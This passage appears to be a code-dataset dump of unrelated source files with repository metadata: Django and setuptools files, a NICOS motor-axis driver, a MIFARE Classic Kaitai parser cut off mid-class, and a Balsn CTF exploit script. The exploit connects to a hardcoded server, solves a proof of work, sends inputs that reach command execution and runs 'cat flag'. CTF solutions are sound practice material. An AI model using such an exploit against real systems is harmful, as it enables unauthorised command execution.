] | 7 | 2017-04-14T15:28:29.000Z | 2021-09-10T09:45:38.000Z | src/program/migrations/0079_eventinstance_uuid.py | lgandersen/bornhack-website | fbda2b4b53dc2cb266d1d7c13ba0aad59d9079df | [
"BSD-3-Clause"
] | 799 | 2016-04-28T09:31:50.000Z | 2022-03-29T09:05:02.000Z | src/program/migrations/0079_eventinstance_uuid.py | lgandersen/bornhack-website | fbda2b4b53dc2cb266d1d7c13ba0aad59d9079df | [
"BSD-3-Clause"
] | 35 | 2016-04-28T09:23:53.000Z | 2021-05-02T12:36:01.000Z | # Generated by Django 3.0.3 on 2020-02-22 13:59
import uuid
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("program", "0078_auto_20200214_2100"),
]
operations = [
migrations.AddField(
model_name="eventinstance",
name="uuid",
field=models.UUIDField(
default=uuid.uuid4,
editable=False,
help_text="This field is mostly here to keep Frab happy, it is not the PK of the model",
null=True,
),
),
]
| 23.153846 | 104 | 0.55814 | 67 | 602 | 4.940299 | 0.791045 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081841 | 0.350498 | 602 | 25 | 105 | 24.08 | 0.764706 | 0.074751 | 0 | 0.111111 | 1 | 0 | 0.21982 | 0.041441 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
049a005b96a52797a15d88dec327f267e14f4272 | 651 | py | Python | kive/portal/apps.py | cfe-lab/Kive | e46b9eb40f085d579c12f47b6b5696d5ee93a9d3 | [
"BSD-3-Clause"
] | 2 | 2016-10-02T18:24:53.000Z | 2019-01-19T09:37:56.000Z | kive/portal/apps.py | dmacmillan/Kive | 76bc8f289f66fb133f78cb6d5689568b7d015915 | [
"BSD-3-Clause"
] | 1,190 | 2015-07-10T22:57:23.000Z | 2022-03-30T05:10:14.000Z | kive/portal/apps.py | dmacmillan/Kive | 76bc8f289f66fb133f78cb6d5689568b7d015915 | [
"BSD-3-Clause"
] | 2 | 2019-07-16T00:25:25.000Z | 2019-11-25T16:32:58.000Z | import logging
import sys
from django.apps import AppConfig
from django.conf import settings
logger = logging.getLogger(__name__)
class PortalConfig(AppConfig):
name = 'portal'
def ready(self):
is_manage_py = sys.argv and sys.argv[0].endswith('manage.py')
if is_manage_py and len(sys.argv) > 1 and sys.argv[1] != 'runserver':
# Running some other management command, don't check secret key.
return
if settings.IS_RANDOM_KEY:
logger.warning(
'KIVE_SECRET_KEY environment variable was not set. Sessions '
'will expire when the server shuts down.')
| 29.590909 | 77 | 0.655914 | 86 | 651 | 4.825581 | 0.651163 | 0.06747 | 0.048193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00625 | 0.262673 | 651 | 21 | 78 | 31 | 0.858333 | 0.095238 | 0 | 0 | 0 | 0 | 0.207836 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.266667 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
049afbb984009ea06474ce34e8657c76529b4597 | 533 | py | Python | setup.py | getyourguide/image-quality-assessment | 6e61ca2d2627e5c16a648db4097519936d86b604 | [
"Apache-2.0"
] | null | null | null | setup.py | getyourguide/image-quality-assessment | 6e61ca2d2627e5c16a648db4097519936d86b604 | [
"Apache-2.0"
] | null | null | null | setup.py | getyourguide/image-quality-assessment | 6e61ca2d2627e5c16a648db4097519936d86b604 | [
"Apache-2.0"
] | null | null | null | import setuptools
setuptools.setup(
name="image-quality-assessment",
version="0.0.1",
author="gdp",
author_email="engineering.data-products@getyourguide.com",
description="TBD",
long_description_content_type="text/markdown",
url="https://github.com/getyourguide/image-quality-assessment",
packages=setuptools.find_packages(),
package_data={
# If any package contains *.yml, include the file in the package:
"": ["*.yml", "*.json", "*.hdf5"],
},
python_requires=">=3.5",
) | 29.611111 | 73 | 0.660413 | 61 | 533 | 5.655738 | 0.737705 | 0.069565 | 0.127536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013605 | 0.172608 | 533 | 18 | 74 | 29.611111 | 0.768707 | 0.118199 | 0 | 0 | 0 | 0 | 0.358209 | 0.140725 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
049f5f9f41f902d0b150f604248f0afb878c2c27 | 1,490 | py | Python | setup.py | radionets-project/vipy | 792b43b77e56d085c649942180f7b83383cba73d | [
"MIT"
] | null | null | null | setup.py | radionets-project/vipy | 792b43b77e56d085c649942180f7b83383cba73d | [
"MIT"
] | 10 | 2021-02-11T08:41:40.000Z | 2021-12-01T14:59:18.000Z | setup.py | radionets-project/vipy | 792b43b77e56d085c649942180f7b83383cba73d | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name="vipy",
version="0.0.3",
description="Simulate radio interferometer observations and visibility generation.",
url="https://github.com/radionets-project/vipy",
author="Kevin Schmidt, Felix Geyer, Stefan Fröse",
author_email="kevin3.schmidt@tu-dortmund.de",
license="MIT",
packages=find_packages(),
install_requires=[
"numpy",
"astropy",
"matplotlib",
"ipython",
"scipy",
"pandas",
"toml",
"pytest",
"pytest-cov",
"jupyter",
"astroplan",
"torch",
"tqdm",
],
setup_requires=["pytest-runner"],
tests_require=["pytest"],
zip_safe=False,
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Scientific/Engineering :: Astronomy",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Scientific/Engineering :: Information Analysis",
],
)
| 31.702128 | 88 | 0.587919 | 135 | 1,490 | 6.437037 | 0.681481 | 0.109321 | 0.143844 | 0.119678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011019 | 0.269128 | 1,490 | 46 | 89 | 32.391304 | 0.786961 | 0 | 0 | 0.044444 | 0 | 0 | 0.567114 | 0.078523 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.022222 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04a0d2b92a66841497b189be82e766ad06751727 | 9,152 | py | Python | nicos/devices/taco/axis.py | ess-dmsc/nicos | 755d61d403ff7123f804c45fc80c7ff4d762993b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 1 | 2021-03-26T10:30:45.000Z | 2021-03-26T10:30:45.000Z | nicos/devices/taco/axis.py | ess-dmsc/nicos | 755d61d403ff7123f804c45fc80c7ff4d762993b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91 | 2020-08-18T09:20:26.000Z | 2022-02-01T11:07:14.000Z | nicos/devices/taco/axis.py | ess-dmsc/nicos | 755d61d403ff7123f804c45fc80c7ff4d762993b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 3 | 2020-08-04T18:35:05.000Z | 2021-04-16T11:22:08.000Z | # -*- coding: utf-8 -*-
# *****************************************************************************
# NICOS, the Networked Instrument Control System of the MLZ
# Copyright (c) 2009-2021 by the NICOS contributors (see AUTHORS)
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Module authors:
# Jens Krüger <jens.krueger@frm2.tum.de>
# Georg Brandl <g.brandl@fz-juelich.de>
#
# *****************************************************************************
"""NICOS axis classes."""
import TACOStates # pylint: disable=import-error
from Motor import Motor as TACOMotor # pylint: disable=import-error
from nicos import session
from nicos.core import ADMIN, SLAVE, Attach, ModeError, Moveable, Param, \
anytype, oneof, requires, status, tupleof, usermethod
from nicos.devices.abstract import Axis as AbstractAxis, CanReference
from nicos.devices.generic.sequence import SeqCall, SeqDev, SeqSleep, \
SequencerMixin
from nicos.devices.taco.core import TacoDevice
class Axis(CanReference, TacoDevice, AbstractAxis):
"""Interface for TACO Axis server devices."""
taco_class = TACOMotor
_TACO_STATUS_MAPPING = dict(TacoDevice._TACO_STATUS_MAPPING)
_TACO_STATUS_MAPPING[TACOStates.INIT] = (status.BUSY, 'referencing')
_TACO_STATUS_MAPPING[TACOStates.RESETTING] = (status.BUSY, 'referencing')
_TACO_STATUS_MAPPING[TACOStates.ALARM] = (status.NOTREACHED, 'position not reached')
parameters = {
'speed': Param('Motor speed', unit='main/s', settable=True),
'accel': Param('Motor acceleration', unit='main/s^2',
settable=True),
'refspeed': Param('Speed driving to reference switch', unit='main/s',
settable=True),
'refswitch': Param('Switch to use as reference', type=str,
settable=True),
'refpos': Param('Position of the reference switch', unit='main',
settable=True),
# do not call deviceReset by default as it does a reference drive
'resetcall': Param('What TACO method to call on reset (deviceInit or '
'deviceReset)', settable=True, default='deviceInit',
type=oneof('deviceInit', 'deviceReset')),
}
def doStart(self, target):
self._taco_guard(self._dev.start, target + self.offset)
def doRead(self, maxage=0):
return self._taco_guard(self._dev.read) - self.offset
def doTime(self, old_value, target):
s, v, a = abs(old_value - target), self.speed, self.accel
if v <= 0 or a <= 0:
return 0
if s > v**2 / a: # do we reach nominal speed?
return s / v + v / a
return 2 * (s / a)**0.5
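A standalone restatement of `doTime`'s trapezoidal-profile arithmetic (the function name is mine), useful for sanity-checking the two regimes:

```python
# If the distance s is large enough to reach nominal speed v (s > v**2/a),
# the move takes s/v plus one accel/decel ramp v/a; otherwise the profile
# is a pure accelerate/decelerate triangle and takes 2*sqrt(s/a).
def move_time(s, v, a):
    if v <= 0 or a <= 0:
        return 0
    if s > v ** 2 / a:
        return s / v + v / a
    return 2 * (s / a) ** 0.5

assert move_time(10, 2, 1) == 7.0   # long move: 10/2 + 2/1
assert move_time(1, 10, 1) == 2.0   # short move: 2*sqrt(1/1)
```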
def doReset(self):
self._taco_reset(self._dev, self.resetcall)
@usermethod
@requires(level=ADMIN, helpmsg='use adjust() to set a new offset')
def setPosition(self, pos):
"""Sets the current position of the axis to the target.
This operation is forbidden in slave mode, and does the right thing
virtually in simulation mode.
"""
if self._mode == SLAVE:
raise ModeError(self, 'setting new position not possible in '
'slave mode')
elif self._sim_intercept:
self._sim_setValue(pos)
return
self._taco_guard(self._dev.setpos, pos)
# update current value in cache
self.read(0)
def doStop(self):
self._taco_guard(self._dev.stop)
def doReference(self):
"""Do a reference drive of the axis (do not use with encoded axes)."""
self.log.info('referencing the axis, please wait...')
self._taco_guard(self._dev.deviceReset)
while self._taco_guard(self._dev.deviceState) \
in (TACOStates.INIT, TACOStates.RESETTING):
session.delay(0.3)
if self._taco_guard(self._dev.isDeviceOff):
self._taco_guard(self._dev.deviceOn)
if self.read() != self.refpos:
self._taco_guard(self._dev.setpos, self.refpos)
def doReadSpeed(self):
return self._taco_guard(self._dev.speed)
def doWriteSpeed(self, value):
self._taco_guard(self._dev.setSpeed, value)
def doReadDragerror(self):
return float(self._taco_guard(
self._dev.deviceQueryResource, 'dragerror'))
def doWriteDragerror(self, value):
self._taco_update_resource('dragerror', str(value))
def doReadPrecision(self):
return float(self._taco_guard(
self._dev.deviceQueryResource, 'precision'))
def doWritePrecision(self, value):
self._taco_update_resource('precision', str(value))
def doReadMaxtries(self):
return int(self._taco_guard(
self._dev.deviceQueryResource, 'maxtries'))
def doWriteMaxtries(self, value):
self._taco_update_resource('maxtries', str(value))
def doReadLoopdelay(self):
return float(self._taco_guard(
self._dev.deviceQueryResource, 'loopdelay'))
def doWriteLoopdelay(self, value):
self._taco_update_resource('loopdelay', str(value))
def doReadBacklash(self):
return float(self._taco_guard(
self._dev.deviceQueryResource, 'backlash'))
def doWriteBacklash(self, value):
self._taco_update_resource('backlash', str(value))
# resources that need to be set on the motor, not the axis device
def _readMotorParam(self, resource, conv=float):
motorname = self._taco_guard(self._dev.deviceQueryResource, 'motor')
client = TACOMotor(motorname)
return conv(client.deviceQueryResource(resource))
def _writeMotorParam(self, resource, value):
motorname = self._taco_guard(self._dev.deviceQueryResource, 'motor')
client = TACOMotor(motorname)
client.deviceOff()
try:
client.deviceUpdateResource(resource, str(value))
finally:
client.deviceOn()
def doReadAccel(self):
return self._readMotorParam('accel')
def doWriteAccel(self, value):
self._writeMotorParam('accel', value)
def doReadRefspeed(self):
return self._readMotorParam('refspeed')
def doWriteRefspeed(self, value):
self._writeMotorParam('refspeed', value)
def doReadRefswitch(self):
return self._readMotorParam('refswitch', str)
def doWriteRefswitch(self, value):
self._writeMotorParam('refswitch', value)
def doReadRefpos(self):
return self._readMotorParam('refpos')
def doWriteRefpos(self, value):
self._writeMotorParam('refpos', value)
class HoveringAxis(SequencerMixin, Axis):
"""An axis that also controls air for airpads."""
attached_devices = {
'switch': Attach('The device used for switching air on and off', Moveable),
}
parameters = {
'startdelay': Param('Delay after switching on air', type=float,
mandatory=True, unit='s'),
'stopdelay': Param('Delay before switching off air', type=float,
mandatory=True, unit='s'),
'switchvalues': Param('(off, on) values to write to switch device',
type=tupleof(anytype, anytype), default=(0, 1)),
}
hardware_access = True
def _generateSequence(self, target):
return [
SeqDev(self._attached_switch, self.switchvalues[1]),
SeqSleep(self.startdelay),
SeqCall(Axis.doStart, self, target),
SeqCall(self._hw_wait),
SeqSleep(self.stopdelay),
SeqDev(self._attached_switch, self.switchvalues[0]),
]
def _hw_wait(self):
# overridden: query Axis status, not HoveringAxis status
while Axis.doStatus(self, 0)[0] == status.BUSY:
session.delay(self._base_loop_delay)
def doStart(self, target):
if self._seq_is_running():
self.stop()
self.log.info('waiting for axis to stop...')
self.wait()
if abs(target - self.read()) < self.precision:
return
self._startSequence(self._generateSequence(target))
def doStop(self):
# stop only the axis, but the sequence has to run through
Axis.doStop(self)
def doTime(self, old_value, target):
return Axis.doTime(
self, old_value, target) + self.startdelay + self.stopdelay
| 37.052632 | 88 | 0.631556 | 1,056 | 9,152 | 5.354167 | 0.303977 | 0.033958 | 0.041387 | 0.054121 | 0.231341 | 0.180403 | 0.093031 | 0.06544 | 0.06544 | 0.027237 | 0 | 0.006265 | 0.25 | 9,152 | 246 | 89 | 37.203252 | 0.817453 | 0.190887 | 0 | 0.15 | 0 | 0 | 0.108835 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2125 | false | 0 | 0.04375 | 0.08125 | 0.425 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04a85192c223afca54121d60e415bd78114d791a | 459 | py | Python | Balsn_CTF_2019/Need_some_flags/solution/Need_some_flags_2_exp.py | sces60107/My-CTF-Challenges | 85fe38f31b416e232e5c6ea80eb7a9c69cb5dd5f | [
"MIT"
] | 3 | 2019-10-11T15:45:23.000Z | 2019-10-16T05:42:32.000Z | Balsn_CTF_2019/Need_some_flags/solution/Need_some_flags_2_exp.py | sces60107/My-CTF-Challenges | 85fe38f31b416e232e5c6ea80eb7a9c69cb5dd5f | [
"MIT"
] | null | null | null | Balsn_CTF_2019/Need_some_flags/solution/Need_some_flags_2_exp.py | sces60107/My-CTF-Challenges | 85fe38f31b416e232e5c6ea80eb7a9c69cb5dd5f | [
"MIT"
] | null | null | null | from pwn import *
import hashlib
r=remote("18.205.38.120",10122)
## pow
temp=r.recvuntil("sha256( ")
prefix=r.recvline().split()[0]
i=0
while True:
data=prefix+str(i)
Hash=hashlib.sha256(data)
if Hash.hexdigest()[:5]=="0"*5:
r.sendline(str(i))
break
i+=1
## get flag
r.sendline(b"0")
r.sendline(b"system")
r.sendline(b"1")
r.sendline(b"nonsecret.pyc")
r.sendline(b"b013")
r.sendline(b"92")
r.sendline(b"3")
r.sendline(b"cat flag")
r.interactive()
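A self-contained demo of the proof-of-work brute force above, with a 1-hex-digit target so it finishes instantly; the prefix here is made up and the function name is mine.

```python
# Find the smallest nonce whose sha256(prefix + nonce) hex digest starts
# with `difficulty` zero characters, like the challenge's PoW loop.
import hashlib

def solve_pow(prefix, difficulty):
    i = 0
    while True:
        digest = hashlib.sha256(prefix + str(i).encode()).hexdigest()
        if digest[:difficulty] == "0" * difficulty:
            return i
        i += 1

nonce = solve_pow(b"balsn", 1)
assert hashlib.sha256(b"balsn" + str(nonce).encode()).hexdigest()[0] == "0"
```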
| 15.827586 | 33 | 0.655773 | 77 | 459 | 3.909091 | 0.532468 | 0.269103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086634 | 0.119826 | 459 | 28 | 34 | 16.392857 | 0.658416 | 0.026144 | 0 | 0 | 0 | 0 | 0.131222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04b4ad9fcdad3b668ebfdad4cb2989d436e7b726 | 32,672 | py | Python | src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/hardware/mifare/mifare_classic.py | SabheeR/hobbits | 8bfb997940c73467af2ceb0275c470b763d2c1bf | [
"MIT"
] | 304 | 2020-02-07T21:05:22.000Z | 2022-03-24T05:30:37.000Z | src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/hardware/mifare/mifare_classic.py | SabheeR/hobbits | 8bfb997940c73467af2ceb0275c470b763d2c1bf | [
"MIT"
] | 2,107 | 2019-11-05T09:26:16.000Z | 2022-02-14T13:35:36.000Z | src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/hardware/mifare/mifare_classic.py | SabheeR/hobbits | 8bfb997940c73467af2ceb0275c470b763d2c1bf | [
"MIT"
] | 30 | 2020-03-11T14:36:43.000Z | 2022-03-07T04:45:17.000Z | # This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class MifareClassic(KaitaiStruct):
"""You can get a dump for testing by the link: https://github.com/zhovner/mfdread/raw/master/dump.mfd
.. seealso::
Source - https://github.com/nfc-tools/libnfc
https://www.nxp.com/docs/en/data-sheet/MF1S70YYX_V1.pdf
"""
SEQ_FIELDS = ["sectors"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
        self._parent = _parent
        self._root = _root if _root else self
        self._debug = collections.defaultdict(dict)

    def _read(self):
        self._debug['sectors']['start'] = self._io.pos()
        self._raw_sectors = []
        self.sectors = []
        i = 0
        while not self._io.is_eof():
            if not 'arr' in self._debug['sectors']:
                self._debug['sectors']['arr'] = []
            self._debug['sectors']['arr'].append({'start': self._io.pos()})
            self._raw_sectors.append(self._io.read_bytes((((4 if i >= 32 else 1) * 4) * 16)))
            _io__raw_sectors = KaitaiStream(BytesIO(self._raw_sectors[-1]))
            _t_sectors = MifareClassic.Sector(i == 0, _io__raw_sectors, self, self._root)
            _t_sectors._read()
            self.sectors.append(_t_sectors)
            self._debug['sectors']['arr'][len(self.sectors) - 1]['end'] = self._io.pos()
            i += 1
        self._debug['sectors']['end'] = self._io.pos()

    class Key(KaitaiStruct):
        SEQ_FIELDS = ["key"]

        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._debug = collections.defaultdict(dict)

        def _read(self):
            self._debug['key']['start'] = self._io.pos()
            self.key = self._io.read_bytes(6)
            self._debug['key']['end'] = self._io.pos()

    class Sector(KaitaiStruct):
        SEQ_FIELDS = ["manufacturer", "data_filler", "trailer"]

        def __init__(self, has_manufacturer, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self.has_manufacturer = has_manufacturer
            self._debug = collections.defaultdict(dict)

        def _read(self):
            if self.has_manufacturer:
                self._debug['manufacturer']['start'] = self._io.pos()
                self.manufacturer = MifareClassic.Manufacturer(self._io, self, self._root)
                self.manufacturer._read()
                self._debug['manufacturer']['end'] = self._io.pos()

            self._debug['data_filler']['start'] = self._io.pos()
            self._raw_data_filler = self._io.read_bytes(((self._io.size() - self._io.pos()) - 16))
            _io__raw_data_filler = KaitaiStream(BytesIO(self._raw_data_filler))
            self.data_filler = MifareClassic.Sector.Filler(_io__raw_data_filler, self, self._root)
            self.data_filler._read()
            self._debug['data_filler']['end'] = self._io.pos()
            self._debug['trailer']['start'] = self._io.pos()
            self.trailer = MifareClassic.Trailer(self._io, self, self._root)
            self.trailer._read()
            self._debug['trailer']['end'] = self._io.pos()

        class Values(KaitaiStruct):
            SEQ_FIELDS = ["values"]

            def __init__(self, _io, _parent=None, _root=None):
                self._io = _io
                self._parent = _parent
                self._root = _root if _root else self
                self._debug = collections.defaultdict(dict)

            def _read(self):
                self._debug['values']['start'] = self._io.pos()
                self.values = []
                i = 0
                while not self._io.is_eof():
                    if not 'arr' in self._debug['values']:
                        self._debug['values']['arr'] = []
                    self._debug['values']['arr'].append({'start': self._io.pos()})
                    _t_values = MifareClassic.Sector.Values.ValueBlock(self._io, self, self._root)
                    _t_values._read()
                    self.values.append(_t_values)
                    self._debug['values']['arr'][len(self.values) - 1]['end'] = self._io.pos()
                    i += 1
                self._debug['values']['end'] = self._io.pos()

            class ValueBlock(KaitaiStruct):
                SEQ_FIELDS = ["valuez", "addrz"]

                def __init__(self, _io, _parent=None, _root=None):
                    self._io = _io
                    self._parent = _parent
                    self._root = _root if _root else self
                    self._debug = collections.defaultdict(dict)

                def _read(self):
                    self._debug['valuez']['start'] = self._io.pos()
                    self.valuez = [None] * (3)
                    for i in range(3):
                        if not 'arr' in self._debug['valuez']:
                            self._debug['valuez']['arr'] = []
                        self._debug['valuez']['arr'].append({'start': self._io.pos()})
                        self.valuez[i] = self._io.read_u4le()
                        self._debug['valuez']['arr'][i]['end'] = self._io.pos()
                    self._debug['valuez']['end'] = self._io.pos()
                    self._debug['addrz']['start'] = self._io.pos()
                    self.addrz = [None] * (4)
                    for i in range(4):
                        if not 'arr' in self._debug['addrz']:
                            self._debug['addrz']['arr'] = []
                        self._debug['addrz']['arr'].append({'start': self._io.pos()})
                        self.addrz[i] = self._io.read_u1()
                        self._debug['addrz']['arr'][i]['end'] = self._io.pos()
                    self._debug['addrz']['end'] = self._io.pos()

                @property
                def addr(self):
                    if hasattr(self, '_m_addr'):
                        return self._m_addr if hasattr(self, '_m_addr') else None

                    if self.valid:
                        self._m_addr = self.addrz[0]

                    return self._m_addr if hasattr(self, '_m_addr') else None

                @property
                def addr_valid(self):
                    if hasattr(self, '_m_addr_valid'):
                        return self._m_addr_valid if hasattr(self, '_m_addr_valid') else None

                    self._m_addr_valid = ((self.addrz[0] == ~(self.addrz[1])) and (self.addrz[0] == self.addrz[2]) and (self.addrz[1] == self.addrz[3]))
                    return self._m_addr_valid if hasattr(self, '_m_addr_valid') else None

                @property
                def valid(self):
                    if hasattr(self, '_m_valid'):
                        return self._m_valid if hasattr(self, '_m_valid') else None

                    self._m_valid = ((self.value_valid) and (self.addr_valid))
                    return self._m_valid if hasattr(self, '_m_valid') else None

                @property
                def value_valid(self):
                    if hasattr(self, '_m_value_valid'):
                        return self._m_value_valid if hasattr(self, '_m_value_valid') else None

                    self._m_value_valid = ((self.valuez[0] == ~(self.valuez[1])) and (self.valuez[0] == self.valuez[2]))
                    return self._m_value_valid if hasattr(self, '_m_value_valid') else None

                @property
                def value(self):
                    if hasattr(self, '_m_value'):
                        return self._m_value if hasattr(self, '_m_value') else None

                    if self.valid:
                        self._m_value = self.valuez[0]

                    return self._m_value if hasattr(self, '_m_value') else None

        class Filler(KaitaiStruct):
            """only to create _io."""
            SEQ_FIELDS = ["data"]

            def __init__(self, _io, _parent=None, _root=None):
                self._io = _io
                self._parent = _parent
                self._root = _root if _root else self
                self._debug = collections.defaultdict(dict)

            def _read(self):
                self._debug['data']['start'] = self._io.pos()
                self.data = self._io.read_bytes(self._io.size())
                self._debug['data']['end'] = self._io.pos()

        @property
        def block_size(self):
            if hasattr(self, '_m_block_size'):
                return self._m_block_size if hasattr(self, '_m_block_size') else None

            self._m_block_size = 16
            return self._m_block_size if hasattr(self, '_m_block_size') else None

        @property
        def data(self):
            if hasattr(self, '_m_data'):
                return self._m_data if hasattr(self, '_m_data') else None

            self._m_data = self.data_filler.data
            return self._m_data if hasattr(self, '_m_data') else None

        @property
        def blocks(self):
            if hasattr(self, '_m_blocks'):
                return self._m_blocks if hasattr(self, '_m_blocks') else None

            io = self.data_filler._io
            _pos = io.pos()
            io.seek(0)
            self._debug['_m_blocks']['start'] = io.pos()
            self._m_blocks = []
            i = 0
            while not io.is_eof():
                if not 'arr' in self._debug['_m_blocks']:
                    self._debug['_m_blocks']['arr'] = []
                self._debug['_m_blocks']['arr'].append({'start': io.pos()})
                self._m_blocks.append(io.read_bytes(self.block_size))
                self._debug['_m_blocks']['arr'][len(self._m_blocks) - 1]['end'] = io.pos()
                i += 1
            self._debug['_m_blocks']['end'] = io.pos()
            io.seek(_pos)
            return self._m_blocks if hasattr(self, '_m_blocks') else None

        @property
        def values(self):
            if hasattr(self, '_m_values'):
                return self._m_values if hasattr(self, '_m_values') else None

            io = self.data_filler._io
            _pos = io.pos()
            io.seek(0)
            self._debug['_m_values']['start'] = io.pos()
            self._m_values = MifareClassic.Sector.Values(io, self, self._root)
            self._m_values._read()
            self._debug['_m_values']['end'] = io.pos()
            io.seek(_pos)
            return self._m_values if hasattr(self, '_m_values') else None

    class Manufacturer(KaitaiStruct):
        SEQ_FIELDS = ["nuid", "bcc", "sak", "atqa", "manufacturer"]

        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._debug = collections.defaultdict(dict)

        def _read(self):
            self._debug['nuid']['start'] = self._io.pos()
            self.nuid = self._io.read_u4le()
            self._debug['nuid']['end'] = self._io.pos()
            self._debug['bcc']['start'] = self._io.pos()
            self.bcc = self._io.read_u1()
            self._debug['bcc']['end'] = self._io.pos()
            self._debug['sak']['start'] = self._io.pos()
            self.sak = self._io.read_u1()
            self._debug['sak']['end'] = self._io.pos()
            self._debug['atqa']['start'] = self._io.pos()
            self.atqa = self._io.read_u2le()
            self._debug['atqa']['end'] = self._io.pos()
            self._debug['manufacturer']['start'] = self._io.pos()
            self.manufacturer = self._io.read_bytes(8)
            self._debug['manufacturer']['end'] = self._io.pos()

    class Trailer(KaitaiStruct):
        SEQ_FIELDS = ["key_a", "access_bits", "user_byte", "key_b"]

        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._debug = collections.defaultdict(dict)

        def _read(self):
            self._debug['key_a']['start'] = self._io.pos()
            self.key_a = MifareClassic.Key(self._io, self, self._root)
            self.key_a._read()
            self._debug['key_a']['end'] = self._io.pos()
            self._debug['access_bits']['start'] = self._io.pos()
            self._raw_access_bits = self._io.read_bytes(3)
            _io__raw_access_bits = KaitaiStream(BytesIO(self._raw_access_bits))
            self.access_bits = MifareClassic.Trailer.AccessConditions(_io__raw_access_bits, self, self._root)
            self.access_bits._read()
            self._debug['access_bits']['end'] = self._io.pos()
            self._debug['user_byte']['start'] = self._io.pos()
            self.user_byte = self._io.read_u1()
            self._debug['user_byte']['end'] = self._io.pos()
            self._debug['key_b']['start'] = self._io.pos()
            self.key_b = MifareClassic.Key(self._io, self, self._root)
            self.key_b._read()
            self._debug['key_b']['end'] = self._io.pos()

        class AccessConditions(KaitaiStruct):
            SEQ_FIELDS = ["raw_chunks"]

